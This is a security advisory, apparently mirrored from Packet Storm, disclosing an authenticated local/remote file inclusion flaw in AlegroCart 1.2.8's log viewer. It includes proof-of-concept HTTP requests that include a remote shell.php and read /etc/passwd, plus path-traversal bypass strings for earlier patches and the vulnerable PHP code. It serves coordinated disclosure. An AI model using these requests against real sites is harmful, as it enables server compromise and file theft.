Lucene search
K

AlegroCart 1.2.8 Local / Remote File Inclusion

🗓️ 16 Nov 2015 00:00:00Reported by Tim CoenType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 22 Views

AlegroCart 1.2.8 Local/Remote File Inclusion - Vulnerable to LFI/RFI, admin credentials required to view logs, patches available, reported and disclosed to the public in November 201

Code
`Security Advisory - Curesec Research Team  
  
1. Introduction  
  
Affected Product: AlegroCart 1.2.8  
Fixed in: Patch AC128_fix_22102015  
Path Link: http://forum.alegrocart.com/download/file.php?id=1047  
Vendor Website: http://alegrocart.com/  
Vulnerability Type: LFI/RFI  
Remote Exploitable: Yes  
Reported to vendor: 09/29/2015  
Disclosed to public: 11/13/2015  
Release mode: Coordinated release  
CVE: n/a  
Credits Tim Coen of Curesec GmbH  
  
2. Vulnerability Description  
  
CVSS  
  
Medium 6.5 AV:N/AC:L/Au:S/C:C/I:C/A:C  
  
Description  
  
When retrieving logs, there are no checks on the given file_path Parameter.  
Because of this, local or remote files can be included, which are then executed  
or printed.  
  
Admin credentials are required to view logs.  
  
3. Proof of Concept  
  
Remote File:  
  
  
POST /ecommerce/AlegroCart_1.2.8/upload/admin2/?controller=report_logs HTTP/1.1  
Host: localhost  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Cookie: alegro=accept; admin_language=en; alegro_sid=96e1abd77b24dd6f820b82eb32f2bd04_36822a89462da91b6ad8c600a468b669; currency=CAD; catalog_language=en  
Connection: keep-alive  
Content-Type: multipart/form-data; boundary=---------------------------16809437203643590021165278222  
Content-Length: 441  
  
-----------------------------16809437203643590021165278222  
Content-Disposition: form-data; name="directory"  
  
error_log  
-----------------------------16809437203643590021165278222  
Content-Disposition: form-data; name="file_path"  
  
http://localhost/shell.php  
-----------------------------16809437203643590021165278222  
Content-Disposition: form-data; name="decrytion"  
  
0  
-----------------------------16809437203643590021165278222--  
  
Local File:  
  
  
POST /ecommerce/AlegroCart_1.2.8/upload/admin2/?controller=report_logs HTTP/1.1  
Host: localhost  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Cookie: alegro=accept; admin_language=en; alegro_sid=96e1abd77b24dd6f820b82eb32f2bd04_36822a89462da91b6ad8c600a468b669; currency=CAD; catalog_language=en  
Connection: keep-alive  
Content-Type: multipart/form-data; boundary=---------------------------16809437203643590021165278222  
Content-Length: 425  
  
-----------------------------16809437203643590021165278222  
Content-Disposition: form-data; name="directory"  
  
error_log  
-----------------------------16809437203643590021165278222  
Content-Disposition: form-data; name="file_path"  
  
/etc/passwd  
-----------------------------16809437203643590021165278222  
Content-Disposition: form-data; name="decrytion"  
  
0  
-----------------------------16809437203643590021165278222--  
  
For the patches AC128_fix_13102015 and AC128_fix_17102015 the following attack  
strings were still working:  
  
  
http://localhost/shell.php?x=ls&foo=/var/www/ecommerce/AlegroCart_1.2.8/upload/logs/error_log/  
  
/var/www/ecommerce/AlegroCart_1.2.8/upload/logs/error_log/../../../../../../../etc/passwd  
  
4. Code  
  
  
/ upload/admin2/controller/report_logs.php  
function get_file(){  
$file = '';  
if($this->request->gethtml('file_path', 'post')){  
$file = file_get_contents($this->request->gethtml('file_path', 'post'));  
}  
if($this->request->gethtml('decrytion', 'post')){  
$file = $this->ccvalidation->deCrypt($file, $this->config->get('config_token'));  
}  
if($file){  
$file = str_replace(array("\r\n", "\r", "\n"),'<br>', $file);  
}  
return $file;  
}  
  
5. Solution  
  
To mitigate this issue please apply this patch:  
  
TODO  
  
Please note that a newer version might already be available.  
  
6.. Report Timeline  
  
09/29/2015 Informed Vendor about Issue  
11/03/2015 Vendor releases fix  
11/13/2015 Disclosed to public  
  
  
Blog Reference:  
http://blog.curesec.com/article/blog/AlegroCart-128-LFIRFI-102.html  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation